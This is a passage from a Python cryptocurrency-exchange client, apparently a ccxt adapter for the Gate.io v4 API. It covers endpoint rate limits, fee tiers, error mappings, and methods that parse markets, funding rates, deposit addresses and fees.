'{settle}/contracts': 1.5,
'{settle}/contracts/{contract}': 1.5,
'{settle}/order_book': 1.5,
'{settle}/trades': 1.5,
'{settle}/candlesticks': 1.5,
'{settle}/tickers': 1.5,
'{settle}/insurance': 1.5,
},
},
},
'private': {
'withdrawals': {
'post': {
'': 3000, # 3000 = 10 seconds
},
'delete': {
'{withdrawal_id}': 300,
},
},
'wallet': {
'get': {
'deposit_address': 300,
'withdrawals': 300,
'deposits': 300,
'sub_account_transfers': 300,
'withdraw_status': 300,
'sub_account_balances': 300,
'fee': 300,
},
'post': {
'transfers': 300,
'sub_account_transfers': 300,
},
},
'spot': {
'get': {
'accounts': 1,
'open_orders': 1,
'orders': 1,
'orders/{order_id}': 1,
'my_trades': 1,
'price_orders': 1,
'price_orders/{order_id}': 1,
},
'post': {
'batch_orders': 1,
'orders': 1,
'cancel_batch_orders': 1,
'price_orders': 1,
},
'delete': {
'orders': 1,
'orders/{order_id}': 1,
'price_orders': 1,
'price_orders/{order_id}': 1,
},
},
'margin': {
'get': {
'accounts': 1.5,
'account_book': 1.5,
'funding_accounts': 1.5,
'loans': 1.5,
'loans/{loan_id}': 1.5,
'loans/{loan_id}/repayment': 1.5,
'loan_records': 1.5,
'loan_records/{load_record_id}': 1.5,
'auto_repay': 1.5,
'transferable': 1.5,
'cross/accounts': 1.5,
'cross/account_book': 1.5,
'cross/loans': 1.5,
'cross/loans/{loan_id}': 1.5,
'cross/loans/repayments': 1.5,
'cross/transferable': 1.5,
},
'post': {
'loans': 1.5,
'merged_loans': 1.5,
'loans/{loan_id}/repayment': 1.5,
'auto_repay': 1.5,
'cross/loans': 1.5,
'cross/loans/repayments': 1.5,
},
'patch': {
'loans/{loan_id}': 1.5,
'loan_records/{loan_record_id}': 1.5,
},
'delete': {
'loans/{loan_id}': 1.5,
},
},
'futures': {
'get': {
'{settle}/accounts': 1.5,
'{settle}/account_book': 1.5,
'{settle}/positions': 1.5,
'{settle}/positions/{contract}': 1.5,
'{settle}/orders': 1.5,
'{settle}/orders/{order_id}': 1.5,
'{settle}/my_trades': 1.5,
'{settle}/position_close': 1.5,
'{settle}/liquidates': 1.5,
'{settle}/price_orders': 1.5,
'{settle}/price_orders/{order_id}': 1.5,
},
'post': {
'{settle}/positions/{contract}/margin': 1.5,
'{settle}/positions/{contract}/leverage': 1.5,
'{settle}/positions/{contract}/risk_limit': 1.5,
'{settle}/dual_mode': 1.5,
'{settle}/dual_comp/positions/{contract}': 1.5,
'{settle}/dual_comp/positions/{contract}/margin': 1.5,
'{settle}/dual_comp/positions/{contract}/leverage': 1.5,
'{settle}/dual_comp/positions/{contract}/risk_limit': 1.5,
'{settle}/orders': 1.5,
'{settle}/price_orders': 1.5,
},
'delete': {
'{settle}/orders': 1.5,
'{settle}/orders/{order_id}': 1.5,
'{settle}/price_orders': 1.5,
'{settle}/price_orders/{order_id}': 1.5,
},
},
'delivery': {
'get': {
'{settle}/accounts': 1.5,
'{settle}/account_book': 1.5,
'{settle}/positions': 1.5,
'{settle}/positions/{contract}': 1.5,
'{settle}/orders': 1.5,
'{settle}/orders/{order_id}': 1.5,
'{settle}/my_trades': 1.5,
'{settle}/position_close': 1.5,
'{settle}/liquidates': 1.5,
'{settle}/price_orders': 1.5,
'{settle}/price_orders/{order_id}': 1.5,
},
'post': {
'{settle}/positions/{contract}/margin': 1.5,
'{settle}/positions/{contract}/leverage': 1.5,
'{settle}/positions/{contract}/risk_limit': 1.5,
'{settle}/orders': 1.5,
'{settle}/price_orders': 1.5,
},
'delete': {
'{settle}/orders': 1.5,
'{settle}/orders/{order_id}': 1.5,
'{settle}/price_orders': 1.5,
'{settle}/price_orders/{order_id}': 1.5,
},
},
},
},
'timeframes': {
'10s': '10s',
'1m': '1m',
'5m': '5m',
'15m': '15m',
'30m': '30m',
'1h': '1h',
'4h': '4h',
'8h': '8h',
'1d': '1d',
'7d': '7d',
},
# copied from gateiov2
'commonCurrencies': {
'88MPH': 'MPH',
'BIFI': 'Bitcoin File',
'BOX': 'DefiBox',
'BTCBEAR': 'BEAR',
'BTCBULL': 'BULL',
'BYN': 'Beyond Finance',
'EGG': 'Goose Finance',
'GTC': 'Game.com', # conflict with Gitcoin and Gastrocoin
'GTC_HT': 'Game.com HT',
'GTC_BSC': 'Game.com BSC',
'HIT': 'HitChain',
'MPH': 'Morpher', # conflict with 88MPH
'RAI': 'Rai Reflex Index', # conflict with RAI Finance
'SBTC': 'Super Bitcoin',
'STX': 'Stox',
'TNC': 'Trinity Network Credit',
'TON': 'TONToken',
'VAI': 'VAIOT',
},
'requiredCredentials': {
'apiKey': True,
'secret': True,
},
'options': {
'networks': {
'TRC20': 'TRX',
'ERC20': 'ETH',
'BEP20': 'BSC',
},
'accountsByType': {
'spot': 'spot',
'margin': 'margin',
'futures': 'futures',
'delivery': 'delivery',
},
'defaultType': 'spot',
'swap': {
'fetchMarkets': {
'settlementCurrencies': ['usdt', 'btc'],
},
},
'futures': {
'fetchMarkets': {
'settlementCurrencies': ['usdt', 'btc'],
},
},
},
'precisionMode': TICK_SIZE,
'fees': {
'trading': {
'tierBased': True,
'feeSide': 'get',
'percentage': True,
'maker': self.parse_number('0.002'),
'taker': self.parse_number('0.002'),
'tiers': {
# volume is in BTC
'maker': [
[self.parse_number('0'), self.parse_number('0.002')],
[self.parse_number('1.5'), self.parse_number('0.00185')],
[self.parse_number('3'), self.parse_number('0.00175')],
[self.parse_number('6'), self.parse_number('0.00165')],
[self.parse_number('12.5'), self.parse_number('0.00155')],
[self.parse_number('25'), self.parse_number('0.00145')],
[self.parse_number('75'), self.parse_number('0.00135')],
[self.parse_number('200'), self.parse_number('0.00125')],
[self.parse_number('500'), self.parse_number('0.00115')],
[self.parse_number('1250'), self.parse_number('0.00105')],
[self.parse_number('2500'), self.parse_number('0.00095')],
[self.parse_number('3000'), self.parse_number('0.00085')],
[self.parse_number('6000'), self.parse_number('0.00075')],
[self.parse_number('11000'), self.parse_number('0.00065')],
[self.parse_number('20000'), self.parse_number('0.00055')],
[self.parse_number('40000'), self.parse_number('0.00055')],
[self.parse_number('75000'), self.parse_number('0.00055')],
],
'taker': [
[self.parse_number('0'), self.parse_number('0.002')],
[self.parse_number('1.5'), self.parse_number('0.00195')],
[self.parse_number('3'), self.parse_number('0.00185')],
[self.parse_number('6'), self.parse_number('0.00175')],
[self.parse_number('12.5'), self.parse_number('0.00165')],
[self.parse_number('25'), self.parse_number('0.00155')],
[self.parse_number('75'), self.parse_number('0.00145')],
[self.parse_number('200'), self.parse_number('0.00135')],
[self.parse_number('500'), self.parse_number('0.00125')],
[self.parse_number('1250'), self.parse_number('0.00115')],
[self.parse_number('2500'), self.parse_number('0.00105')],
[self.parse_number('3000'), self.parse_number('0.00095')],
[self.parse_number('6000'), self.parse_number('0.00085')],
[self.parse_number('11000'), self.parse_number('0.00075')],
[self.parse_number('20000'), self.parse_number('0.00065')],
[self.parse_number('40000'), self.parse_number('0.00065')],
[self.parse_number('75000'), self.parse_number('0.00065')],
],
},
},
'swap': {
'tierBased': True,
'feeSide': 'base',
'percentage': True,
'maker': self.parse_number('0.0'),
'taker': self.parse_number('0.0005'),
'tiers': {
'maker': [
[self.parse_number('0'), self.parse_number('0.0000')],
[self.parse_number('1.5'), self.parse_number('-0.00005')],
[self.parse_number('3'), self.parse_number('-0.00005')],
[self.parse_number('6'), self.parse_number('-0.00005')],
[self.parse_number('12.5'), self.parse_number('-0.00005')],
[self.parse_number('25'), self.parse_number('-0.00005')],
[self.parse_number('75'), self.parse_number('-0.00005')],
[self.parse_number('200'), self.parse_number('-0.00005')],
[self.parse_number('500'), self.parse_number('-0.00005')],
[self.parse_number('1250'), self.parse_number('-0.00005')],
[self.parse_number('2500'), self.parse_number('-0.00005')],
[self.parse_number('3000'), self.parse_number('-0.00008')],
[self.parse_number('6000'), self.parse_number('-0.01000')],
[self.parse_number('11000'), self.parse_number('-0.01002')],
[self.parse_number('20000'), self.parse_number('-0.01005')],
[self.parse_number('40000'), self.parse_number('-0.02000')],
[self.parse_number('75000'), self.parse_number('-0.02005')],
],
'taker': [
[self.parse_number('0'), self.parse_number('0.00050')],
[self.parse_number('1.5'), self.parse_number('0.00048')],
[self.parse_number('3'), self.parse_number('0.00046')],
[self.parse_number('6'), self.parse_number('0.00044')],
[self.parse_number('12.5'), self.parse_number('0.00042')],
[self.parse_number('25'), self.parse_number('0.00040')],
[self.parse_number('75'), self.parse_number('0.00038')],
[self.parse_number('200'), self.parse_number('0.00036')],
[self.parse_number('500'), self.parse_number('0.00034')],
[self.parse_number('1250'), self.parse_number('0.00032')],
[self.parse_number('2500'), self.parse_number('0.00030')],
[self.parse_number('3000'), self.parse_number('0.00030')],
[self.parse_number('6000'), self.parse_number('0.00030')],
[self.parse_number('11000'), self.parse_number('0.00030')],
[self.parse_number('20000'), self.parse_number('0.00030')],
[self.parse_number('40000'), self.parse_number('0.00030')],
[self.parse_number('75000'), self.parse_number('0.00030')],
],
},
},
},
# https://www.gate.io/docs/apiv4/en/index.html#label-list
'exceptions': {
'INVALID_PARAM_VALUE': BadRequest,
'INVALID_PROTOCOL': BadRequest,
'INVALID_ARGUMENT': BadRequest,
'INVALID_REQUEST_BODY': BadRequest,
'MISSING_REQUIRED_PARAM': ArgumentsRequired,
'BAD_REQUEST': BadRequest,
'INVALID_CONTENT_TYPE': BadRequest,
'NOT_ACCEPTABLE': BadRequest,
'METHOD_NOT_ALLOWED': BadRequest,
'NOT_FOUND': ExchangeError,
'INVALID_CREDENTIALS': AuthenticationError,
'INVALID_KEY': AuthenticationError,
'IP_FORBIDDEN': AuthenticationError,
'READ_ONLY': PermissionDenied,
'INVALID_SIGNATURE': AuthenticationError,
'MISSING_REQUIRED_HEADER': AuthenticationError,
'REQUEST_EXPIRED': AuthenticationError,
'ACCOUNT_LOCKED': AccountSuspended,
'FORBIDDEN': PermissionDenied,
'SUB_ACCOUNT_NOT_FOUND': ExchangeError,
'SUB_ACCOUNT_LOCKED': AccountSuspended,
'MARGIN_BALANCE_EXCEPTION': ExchangeError,
'MARGIN_TRANSFER_FAILED': ExchangeError,
'TOO_MUCH_FUTURES_AVAILABLE': ExchangeError,
'FUTURES_BALANCE_NOT_ENOUGH': InsufficientFunds,
'ACCOUNT_EXCEPTION': ExchangeError,
'SUB_ACCOUNT_TRANSFER_FAILED': ExchangeError,
'ADDRESS_NOT_USED': ExchangeError,
'TOO_FAST': RateLimitExceeded,
'WITHDRAWAL_OVER_LIMIT': ExchangeError,
'API_WITHDRAW_DISABLED': ExchangeNotAvailable,
'INVALID_WITHDRAW_ID': ExchangeError,
'INVALID_WITHDRAW_CANCEL_STATUS': ExchangeError,
'INVALID_PRECISION': InvalidOrder,
'INVALID_CURRENCY': BadSymbol,
'INVALID_CURRENCY_PAIR': BadSymbol,
'POC_FILL_IMMEDIATELY': ExchangeError,
'ORDER_NOT_FOUND': OrderNotFound,
'ORDER_CLOSED': InvalidOrder,
'ORDER_CANCELLED': InvalidOrder,
'QUANTITY_NOT_ENOUGH': InvalidOrder,
'BALANCE_NOT_ENOUGH': InsufficientFunds,
'MARGIN_NOT_SUPPORTED': InvalidOrder,
'MARGIN_BALANCE_NOT_ENOUGH': InsufficientFunds,
'AMOUNT_TOO_LITTLE': InvalidOrder,
'AMOUNT_TOO_MUCH': InvalidOrder,
'REPEATED_CREATION': InvalidOrder,
'LOAN_NOT_FOUND': OrderNotFound,
'LOAN_RECORD_NOT_FOUND': OrderNotFound,
'NO_MATCHED_LOAN': ExchangeError,
'NOT_MERGEABLE': ExchangeError,
'NO_CHANGE': ExchangeError,
'REPAY_TOO_MUCH': ExchangeError,
'TOO_MANY_CURRENCY_PAIRS': InvalidOrder,
'TOO_MANY_ORDERS': InvalidOrder,
'MIXED_ACCOUNT_TYPE': InvalidOrder,
'AUTO_BORROW_TOO_MUCH': ExchangeError,
'TRADE_RESTRICTED': InsufficientFunds,
'USER_NOT_FOUND': ExchangeError,
'CONTRACT_NO_COUNTER': ExchangeError,
'CONTRACT_NOT_FOUND': BadSymbol,
'RISK_LIMIT_EXCEEDED': ExchangeError,
'INSUFFICIENT_AVAILABLE': InsufficientFunds,
'LIQUIDATE_IMMEDIATELY': InvalidOrder,
'LEVERAGE_TOO_HIGH': InvalidOrder,
'LEVERAGE_TOO_LOW': InvalidOrder,
'ORDER_NOT_OWNED': ExchangeError,
'ORDER_FINISHED': ExchangeError,
'POSITION_CROSS_MARGIN': ExchangeError,
'POSITION_IN_LIQUIDATION': ExchangeError,
'POSITION_IN_CLOSE': ExchangeError,
'POSITION_EMPTY': InvalidOrder,
'REMOVE_TOO_MUCH': ExchangeError,
'RISK_LIMIT_NOT_MULTIPLE': ExchangeError,
'RISK_LIMIT_TOO_HIGH': ExchangeError,
'RISK_LIMIT_TOO_lOW': ExchangeError,
'PRICE_TOO_DEVIATED': InvalidOrder,
'SIZE_TOO_LARGE': InvalidOrder,
'SIZE_TOO_SMALL': InvalidOrder,
'PRICE_OVER_LIQUIDATION': InvalidOrder,
'PRICE_OVER_BANKRUPT': InvalidOrder,
'ORDER_POC_IMMEDIATE': InvalidOrder,
'INCREASE_POSITION': InvalidOrder,
'CONTRACT_IN_DELISTING': ExchangeError,
'INTERNAL': ExchangeError,
'SERVER_ERROR': ExchangeError,
'TOO_BUSY': ExchangeNotAvailable,
},
})
def fetch_markets(self, params={}):
# :param params['type']: 'spot', 'margin', 'futures' or 'delivery'
# :param params['settle']: The quote currency
defaultType = self.safe_string_2(self.options, 'fetchMarkets', 'defaultType', 'spot')
type = self.safe_string(params, 'type', defaultType)
query = self.omit(params, 'type')
spot = (type == 'spot')
margin = (type == 'margin')
futures = (type == 'futures')
swap = (type == 'swap')
option = (type == 'option')
if not spot and not margin and not futures and not swap:
raise ExchangeError(self.id + " does not support '" + type + "' type, set exchange.options['defaultType'] to " + "'spot', 'margin', 'swap' or 'futures'") # eslint-disable-line quotes
response = None
result = []
method = self.get_supported_mapping(type, {
'spot': 'publicSpotGetCurrencyPairs',
'margin': 'publicMarginGetCurrencyPairs',
'swap': 'publicFuturesGetSettleContracts',
'futures': 'publicDeliveryGetSettleContracts',
})
if swap or futures or option:
settlementCurrencies = self.get_settlement_currencies(type, 'fetchMarkets')
for c in range(0, len(settlementCurrencies)):
settle = settlementCurrencies[c]
query['settle'] = settle
response = getattr(self, method)(query)
# Perpetual swap
# [
# {
# "name": "BTC_USDT",
# "type": "direct",
# "quanto_multiplier": "0.0001",
# "ref_discount_rate": "0",
# "order_price_deviate": "0.5",
# "maintenance_rate": "0.005",
# "mark_type": "index",
# "last_price": "38026",
# "mark_price": "37985.6",
# "index_price": "37954.92",
# "funding_rate_indicative": "0.000219",
# "mark_price_round": "0.01",
# "funding_offset": 0,
# "in_delisting": False,
# "risk_limit_base": "1000000",
# "interest_rate": "0.0003",
# "order_price_round": "0.1",
# "order_size_min": 1,
# "ref_rebate_rate": "0.2",
# "funding_interval": 28800,
# "risk_limit_step": "1000000",
# "leverage_min": "1",
# "leverage_max": "100",
# "risk_limit_max": "8000000",
# "maker_fee_rate": "-0.00025",
# "taker_fee_rate": "0.00075",
# "funding_rate": "0.002053",
# "order_size_max": 1000000,
# "funding_next_apply": 1610035200,
# "short_users": 977,
# "config_change_time": 1609899548,
# "trade_size": 28530850594,
# "position_size": 5223816,
# "long_users": 455,
# "funding_impact_value": "60000",
# "orders_limit": 50,
# "trade_id": 10851092,
# "orderbook_id": 2129638396
# }
# ]
#
# Delivery Futures
# [
# {
# "name": "BTC_USDT_20200814",
# "underlying": "BTC_USDT",
# "cycle": "WEEKLY",
# "type": "direct",
# "quanto_multiplier": "0.0001",
# "mark_type": "index",
# "last_price": "9017",
# "mark_price": "9019",
# "index_price": "9005.3",
# "basis_rate": "0.185095",
# "basis_value": "13.7",
# "basis_impact_value": "100000",
# "settle_price": "0",
# "settle_price_interval": 60,
# "settle_price_duration": 1800,
# "settle_fee_rate": "0.0015",
# "expire_time": 1593763200,
# "order_price_round": "0.1",
# "mark_price_round": "0.1",
# "leverage_min": "1",
# "leverage_max": "100",
# "maintenance_rate": "1000000",
# "risk_limit_base": "140.726652109199",
# "risk_limit_step": "1000000",
# "risk_limit_max": "8000000",
# "maker_fee_rate": "-0.00025",
# "taker_fee_rate": "0.00075",
# "ref_discount_rate": "0",
# "ref_rebate_rate": "0.2",
# "order_price_deviate": "0.5",
# "order_size_min": 1,
# "order_size_max": 1000000,
# "orders_limit": 50,
# "orderbook_id": 63,
# "trade_id": 26,
# "trade_size": 435,
# "position_size": 130,
# "config_change_time": 1593158867,
# "in_delisting": False
# }
# ]
#
for i in range(0, len(response)):
market = response[i]
id = self.safe_string(market, 'name')
parts = id.split('_')
baseId = self.safe_string(parts, 0)
quoteId = self.safe_string(parts, 1)
date = self.safe_string(parts, 2)  # None for perpetual contracts whose name has only two parts
linear = quoteId.lower() == settle
inverse = baseId.lower() == settle
base = self.safe_currency_code(baseId)
quote = self.safe_currency_code(quoteId)
symbol = ''
if date:
symbol = base + '/' + quote + '-' + date + ':' + self.safe_currency_code(settle)
else:
symbol = base + '/' + quote + ':' + self.safe_currency_code(settle)
priceDeviate = self.safe_string(market, 'order_price_deviate')
markPrice = self.safe_string(market, 'mark_price')
minMultiplier = Precise.string_sub('1', priceDeviate)
maxMultiplier = Precise.string_add('1', priceDeviate)
minPrice = Precise.string_mul(minMultiplier, markPrice)
maxPrice = Precise.string_mul(maxMultiplier, markPrice)
takerPercent = self.safe_string(market, 'taker_fee_rate')
makerPercent = self.safe_string(market, 'maker_fee_rate', takerPercent)
feeIndex = 'swap' if (type == 'futures') else type
pricePrecision = self.safe_number(market, 'order_price_round')
result.append({
'info': market,
'id': id,
'baseId': baseId,
'quoteId': quoteId,
'settleId': self.safe_symbol(settle),
'base': base,
'quote': quote,
'symbol': symbol,
'type': type,
'spot': spot,
'margin': margin,
'futures': futures,
'swap': swap,
'option': option,
'derivative': True,
'contract': True,
'linear': linear,
'inverse': inverse,
# Fee is in %, so divide by 100
'taker': self.parse_number(Precise.string_div(takerPercent, '100')),
'maker': self.parse_number(Precise.string_div(makerPercent, '100')),
'contractSize': self.safe_string(market, 'quanto_multiplier'),
'precision': {
'amount': self.parse_number('1'),
'price': pricePrecision,
},
'limits': {
'leverage': {
'min': self.safe_number(market, 'leverage_min'),
'max': self.safe_number(market, 'leverage_max'),
},
'amount': {
'min': self.safe_number(market, 'order_size_min'),
'max': self.safe_number(market, 'order_size_max'),
},
'price': {
'min': minPrice,
'max': maxPrice,
},
},
'expiry': self.safe_integer(market, 'expire_time'),
'fees': self.safe_value(self.fees, feeIndex, {}),
})
else:
response = getattr(self, method)(query)
#
# Spot
# [
# {
# "id": "DEGO_USDT",
# "base": "DEGO",
# "quote": "USDT",
# "fee": "0.2",
# "min_quote_amount": "1",
# "amount_precision": "4",
# "precision": "4",
# "trade_status": "tradable",
# "sell_start": "0",
# "buy_start": "0"
# }
# ]
#
# Margin
# [
# {
# "id": "ETH_USDT",
# "base": "ETH",
# "quote": "USDT",
# "leverage": 3,
# "min_base_amount": "0.01",
# "min_quote_amount": "100",
# "max_quote_amount": "1000000"
# }
# ]
#
for i in range(0, len(response)):
market = response[i]
id = self.safe_string(market, 'id')
spot = (type == 'spot')
futures = (type == 'futures')
swap = (type == 'swap')
option = (type == 'option')
baseId, quoteId = id.split('_')
base = self.safe_currency_code(baseId)
quote = self.safe_currency_code(quoteId)
symbol = base + '/' + quote
takerPercent = self.safe_string(market, 'fee')
makerPercent = self.safe_string(market, 'maker_fee_rate', takerPercent)
amountPrecisionString = self.safe_string(market, 'amount_precision')
pricePrecisionString = self.safe_string(market, 'precision')
amountPrecision = self.parse_number(self.parse_precision(amountPrecisionString))
pricePrecision = self.parse_number(self.parse_precision(pricePrecisionString))
tradeStatus = self.safe_string(market, 'trade_status')
result.append({
'info': market,
'id': id,
'baseId': baseId,
'quoteId': quoteId,
'base': base,
'quote': quote,
'symbol': symbol,
'type': type,
'spot': spot,
'margin': margin,
'futures': futures,
'swap': swap,
'option': option,
'contract': False,
'derivative': False,
'linear': False,
'inverse': False,
# Fee is in %, so divide by 100
'taker': self.parse_number(Precise.string_div(takerPercent, '100')),
'maker': self.parse_number(Precise.string_div(makerPercent, '100')),
'precision': {
'amount': amountPrecision,
'price': pricePrecision,
},
'active': tradeStatus == 'tradable',
'limits': {
'amount': {
'min': amountPrecision,
'max': None,
},
'price': {
'min': pricePrecision,
'max': None,
},
'cost': {
'min': self.safe_number(market, 'min_quote_amount'),
'max': None,
},
'leverage': {
'max': self.safe_number(market, 'lever', 1),
},
},
})
return result
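# Contract markets (swap/futures) are addressed by contract + settle currency,
# spot/margin markets by currency_pair.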
def prepare_request(self, market):
if market['contract']:
return {
'contract': market['id'],
'settle': market['settleId'],
}
else:
return {
'currency_pair': market['id'],
}
def get_settlement_currencies(self, type, method):
options = self.safe_value(self.options, type, {}) # ['BTC', 'USDT'] unified codes
fetchMarketsContractOptions = self.safe_value(options, method, {})
defaultSettle = ['usdt'] if type == 'swap' else ['btc']
return self.safe_value(fetchMarketsContractOptions, 'settlementCurrencies', defaultSettle)
def fetch_currencies(self, params={}):
response = self.publicSpotGetCurrencies(params)
#
# {
# "currency": "BCN",
# "delisted": False,
# "withdraw_disabled": True,
# "withdraw_delayed": False,
# "deposit_disabled": True,
# "trade_disabled": False
# }
#
result = {}
# TODO: remove magic constants
amountPrecision = self.parse_number('1e-6')
for i in range(0, len(response)):
entry = response[i]
currencyId = self.safe_string(entry, 'currency')
code = self.safe_currency_code(currencyId)
delisted = self.safe_value(entry, 'delisted')
withdraw_disabled = self.safe_value(entry, 'withdraw_disabled')
deposit_disabled = self.safe_value(entry, 'deposit_disabled')
trade_disabled = self.safe_value(entry, 'trade_disabled')
active = not (delisted and withdraw_disabled and deposit_disabled and trade_disabled)
result[code] = {
'id': currencyId,
'name': None,
'code': code,
'precision': amountPrecision,
'info': entry,
'active': active,
'fee': None,
'fees': [],
'limits': self.limits,
}
return result
def fetch_funding_rate(self, symbol, params={}):
self.load_markets()
market = self.market(symbol)
request = {
'contract': market['id'],
'settle': market['quote'].lower(),
}
response = self.publicFuturesGetSettleContractsContract(self.extend(request, params))
#
# [
# {
# "name": "BTC_USDT",
# "type": "direct",
# "quanto_multiplier": "0.0001",
# "ref_discount_rate": "0",
# "order_price_deviate": "0.5",
# "maintenance_rate": "0.005",
# "mark_type": "index",
# "last_price": "38026",
# "mark_price": "37985.6",
# "index_price": "37954.92",
# "funding_rate_indicative": "0.000219",
# "mark_price_round": "0.01",
# "funding_offset": 0,
# "in_delisting": False,
# "risk_limit_base": "1000000",
# "interest_rate": "0.0003",
# "order_price_round": "0.1",
# "order_size_min": 1,
# "ref_rebate_rate": "0.2",
# "funding_interval": 28800,
# "risk_limit_step": "1000000",
# "leverage_min": "1",
# "leverage_max": "100",
# "risk_limit_max": "8000000",
# "maker_fee_rate": "-0.00025",
# "taker_fee_rate": "0.00075",
# "funding_rate": "0.002053",
# "order_size_max": 1000000,
# "funding_next_apply": 1610035200,
# "short_users": 977,
# "config_change_time": 1609899548,
# "trade_size": 28530850594,
# "position_size": 5223816,
# "long_users": 455,
# "funding_impact_value": "60000",
# "orders_limit": 50,
# "trade_id": 10851092,
# "orderbook_id": 2129638396
# }
# ]
#
return self.parse_funding_rate(response)
def fetch_funding_rates(self, symbols=None, params={}):
self.load_markets()
settle = self.safe_string(params, 'settle') # TODO: Save settle in markets?
request = {
'settle': settle.lower(),
}
response = self.publicFuturesGetSettleContracts(self.extend(request, params))
#
# [
# {
# "name": "BTC_USDT",
# "type": "direct",
# "quanto_multiplier": "0.0001",
# "ref_discount_rate": "0",
# "order_price_deviate": "0.5",
# "maintenance_rate": "0.005",
# "mark_type": "index",
# "last_price": "38026",
# "mark_price": "37985.6",
# "index_price": "37954.92",
# "funding_rate_indicative": "0.000219",
# "mark_price_round": "0.01",
# "funding_offset": 0,
# "in_delisting": False,
# "risk_limit_base": "1000000",
# "interest_rate": "0.0003",
# "order_price_round": "0.1",
# "order_size_min": 1,
# "ref_rebate_rate": "0.2",
# "funding_interval": 28800,
# "risk_limit_step": "1000000",
# "leverage_min": "1",
# "leverage_max": "100",
# "risk_limit_max": "8000000",
# "maker_fee_rate": "-0.00025",
# "taker_fee_rate": "0.00075",
# "funding_rate": "0.002053",
# "order_size_max": 1000000,
# "funding_next_apply": 1610035200,
# "short_users": 977,
# "config_change_time": 1609899548,
# "trade_size": 28530850594,
# "position_size": 5223816,
# "long_users": 455,
# "funding_impact_value": "60000",
# "orders_limit": 50,
# "trade_id": 10851092,
# "orderbook_id": 2129638396
# }
# ]
#
result = self.parse_funding_rates(response)
return self.filter_by_array(result, 'symbol', symbols)
def parse_funding_rate(self, contract, market=None):
#
# {
# "name": "BTC_USDT",
# "type": "direct",
# "quanto_multiplier": "0.0001",
# "ref_discount_rate": "0",
# "order_price_deviate": "0.5",
# "maintenance_rate": "0.005",
# "mark_type": "index",
# "last_price": "38026",
# "mark_price": "37985.6",
# "index_price": "37954.92",
# "funding_rate_indicative": "0.000219",
# "mark_price_round": "0.01",
# "funding_offset": 0,
# "in_delisting": False,
# "risk_limit_base": "1000000",
# "interest_rate": "0.0003",
# "order_price_round": "0.1",
# "order_size_min": 1,
# "ref_rebate_rate": "0.2",
# "funding_interval": 28800,
# "risk_limit_step": "1000000",
# "leverage_min": "1",
# "leverage_max": "100",
# "risk_limit_max": "8000000",
# "maker_fee_rate": "-0.00025",
# "taker_fee_rate": "0.00075",
# "funding_rate": "0.002053",
# "order_size_max": 1000000,
# "funding_next_apply": 1610035200,
# "short_users": 977,
# "config_change_time": 1609899548,
# "trade_size": 28530850594,
# "position_size": 5223816,
# "long_users": 455,
# "funding_impact_value": "60000",
# "orders_limit": 50,
# "trade_id": 10851092,
# "orderbook_id": 2129638396
# }
#
marketId = self.safe_string(contract, 'name')
symbol = self.safe_symbol(marketId, market)
markPrice = self.safe_number(contract, 'mark_price')
indexPrice = self.safe_number(contract, 'index_price')
interestRate = self.safe_number(contract, 'interest_rate')
fundingRate = self.safe_string(contract, 'funding_rate')
fundingInterval = self.safe_integer(contract, 'funding_interval') * 1000
nextFundingTime = self.safe_integer(contract, 'funding_next_apply') * 1000
previousFundingTime = (self.safe_number(contract, 'funding_next_apply') * 1000) - fundingInterval
fundingRateIndicative = self.safe_number(contract, 'funding_rate_indicative')
timestamp = self.milliseconds()
return {
'info': contract,
'symbol': symbol,
'markPrice': markPrice,
'indexPrice': indexPrice,
'interestRate': interestRate,
'estimatedSettlePrice': None,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'previousFundingRate': fundingRate,
'nextFundingRate': fundingRateIndicative,
'previousFundingTimestamp': previousFundingTime,
'nextFundingTimestamp': nextFundingTime,
'previousFundingDatetime': self.iso8601(previousFundingTime),
'nextFundingDatetime': self.iso8601(nextFundingTime),
}
def fetch_network_deposit_address(self, code, params={}):
self.load_markets()
currency = self.currency(code)
request = {
'currency': currency['id'],
}
response = self.privateWalletGetDepositAddress(self.extend(request, params))
addresses = self.safe_value(response, 'multichain_addresses')
currencyId = self.safe_string(response, 'currency')
code = self.safe_currency_code(currencyId)
result = {}
for i in range(0, len(addresses)):
entry = addresses[i]
#
# {
# "chain": "ETH",
# "address": "0x359a697945E79C7e17b634675BD73B33324E9408",
# "payment_id": "",
# "payment_name": "",
# "obtain_failed": "0"
# }
#
obtainFailed = self.safe_integer(entry, 'obtain_failed')
if obtainFailed:
continue
network = self.safe_string(entry, 'chain')
address = self.safe_string(entry, 'address')
tag = self.safe_string(entry, 'payment_id')
tagLength = len(tag)
tag = tag if tagLength else None
result[network] = {
'info': entry,
'code': code,
'address': address,
'tag': tag,
}
return result
def fetch_deposit_address(self, code, params={}):
self.load_markets()
currency = self.currency(code)
request = {
'currency': currency['id'],
}
response = self.privateWalletGetDepositAddress(self.extend(request, params))
#
# {
# "currency": "XRP",
# "address": "rHcFoo6a9qT5NHiVn1THQRhsEGcxtYCV4d 391331007",
# "multichain_addresses": [
# {
# "chain": "XRP",
# "address": "rHcFoo6a9qT5NHiVn1THQRhsEGcxtYCV4d",
# "payment_id": "391331007",
# "payment_name": "Tag",
# "obtain_failed": 0
# }
# ]
# }
#
currencyId = self.safe_string(response, 'currency')
code = self.safe_currency_code(currencyId)
addressField = self.safe_string(response, 'address')
tag = None
address = None
if addressField.find(' ') >= 0:
splitted = addressField.split(' ')
address = splitted[0]
tag = splitted[1]
else:
address = addressField
return {
'info': response,
'code': code,
'address': address,
'tag': tag,
'network': None,
}
def fetch_trading_fees(self, params={}):
self.load_markets()
response = self.privateWalletGetFee(params)
#
# {
# "user_id": 1486602,
# "taker_fee": "0.002",
# "maker_fee": "0.002",
# "gt_discount": True,
# "gt_taker_fee": "0.0015",
# "gt_maker_fee": "0.0015",
# "loan_fee": "0.18",
# "point_type": "0",
# "futures_taker_fee": "0.0005",
# "futures_maker_fee": "0"
# }
#
result = {}
taker = self.safe_number(response, 'taker_fee')
maker = self.safe_number(response, 'maker_fee')
for i in range(0, len(self.symbols)):
symbol = self.symbols[i]
result[symbol] = {
'maker': maker,
'taker': taker,
'info': response,
'symbol': symbol,
}
return result
def fetch_funding_fees(self, params={}):
self.load_markets()
response = self.privateWalletGetWithdrawStatus(params)
#
# {
# "currency": "MTN",
# "name": "Medicalchain",
# "name_cn": "Medicalchain",
# "deposit": "0",
# "withdraw_percent": "0%",
# "withdraw_fix": "900",
# "withdraw_day_limit": "500000",
# "withdraw_day_limit_remain": "500000",
# "withdraw_amount_mini": "900.1",
# "withdraw_eachtime_limit": "90000000000",
# "withdraw_fix_on_chains": {
# "ETH": "900"
# }
# }
#
withdrawFees = {}
for i in range(0, len(response)):
